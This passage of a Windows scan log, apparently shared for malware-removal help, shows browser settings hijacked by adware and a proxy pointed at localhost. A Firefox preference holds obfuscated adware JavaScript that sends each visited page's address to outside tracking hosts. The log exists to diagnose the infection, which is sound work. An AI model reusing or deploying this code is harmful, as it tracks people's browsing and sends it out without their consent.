Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ElbyCDFL.sys -- (ElbyCDFL) DRV - [2005/07/22 10:20:04 | 001,275,776 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\P16X.sys -- (P16X) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://nav.brotlab.net?uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://nav.brotlab.net?uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKLM\..\SearchScopes,DefaultScope = {E921F400-D383-4B1B-9DE6-FCFCACFC1173} IE - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE IE - HKLM\..\SearchScopes\{80c554b9-c7f8-4a21-9471-06d606da78a2}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE IE - HKLM\..\SearchScopes\{E921F400-D383-4B1B-9DE6-FCFCACFC1173}: "URL" = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {E921F400-D383-4B1B-9DE6-FCFCACFC1173} IE - HKU\.DEFAULT\..\SearchScopes\{E921F400-D383-4B1B-9DE6-FCFCACFC1173}: "URL" = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {E921F400-D383-4B1B-9DE6-FCFCACFC1173} IE - HKU\S-1-5-18\..\SearchScopes\{E921F400-D383-4B1B-9DE6-FCFCACFC1173}: "URL" = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = www.123rede.com?oem=svcrp&uid=WD-WCAYUAC14860_WDCWD5000AAKX-083CA1&tm=1451079155 IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = www.123rede.com?oem=svcrp&uid=WD-WCAYUAC14860_WDCWD5000AAKX-083CA1&tm=1451079155 IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 27 9B 37 B4 81 DA CF 01 [binary data] IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..\SearchScopes,DefaultScope = {E921F400-D383-4B1B-9DE6-FCFCACFC1173} IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\..\SearchScopes\{E921F400-D383-4B1B-9DE6-FCFCACFC1173}: "URL" = http://search.navegaki.com?q={searchTerms}&uid={19ab0b6ed7384e159576d74883967d0d}&r=eg IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 1 IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = IE - HKU\S-1-5-21-466573164-1131257755-4088124421-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1:8080;https=127.0.0.1:8080 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.countryCode: "BR" FF - prefs.js..browser.search.defaultenginename: "navegaki" FF - prefs.js..browser.search.region: "BR" FF - prefs.js..browser.search.searchengine.alias: "istartsurf" FF - prefs.js..browser.search.searchengine.desc: "this is my first firefox searchEngine" FF - prefs.js..browser.search.searchengine.iconURL: "http://www.istartsurf.com/web/favicon.ico" FF - prefs.js..browser.search.searchengine.name: "istartsurf" FF - prefs.js..browser.search.searchengine.ptid: "cor" FF - prefs.js..browser.search.searchengine.uid: "WDCXWD5000AAKX-083CA1_WD-WCAYUAC1486014860" FF - prefs.js..browser.search.searchengine.url: "http://www.istartsurf.com/web/?type=dspp&ts=1437923594&z=ba89a360de2b9465b0e46d5gbzfc6mct3o4c8wcqaw&from=cor&uid=WDCXWD5000AAKX-083CA1_WD-WCAYUAC1486014860&q={searchTerms}" FF - prefs.js..browser.search.selectedEngine: "navegaki" FF - prefs.js..browser.search.useDBForOrder: true FF - prefs.js..browser.startup.homepage: "www.123rede.com?oem=svcrp&uid=WD-WCAYUAC14860_WDCWD5000AAKX-083CA1&tm=1451079155" FF - prefs.js..extensions.ZDaaJWkgvQ3v4HHw.scode: "(function(){try{if(window.self.location.href.indexOf(\"rjC7qdr8pjw6rHY5pjwHrHU6rdC\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i-1){return;}}for(var j=0,a=d[1],l=a.length;j-1){(new Image).src = \"//\"+[\"firstfast.xyz\",\"mymatrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1120&pid=724&hid=17643591738891339707\";return;}}for(var j=0,a=u[1],l=a.length;j-1||ifr.src.indexOf('=15072885')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a[b]);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e[b]&&void 0!==e[b]&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e[b]));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" \")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 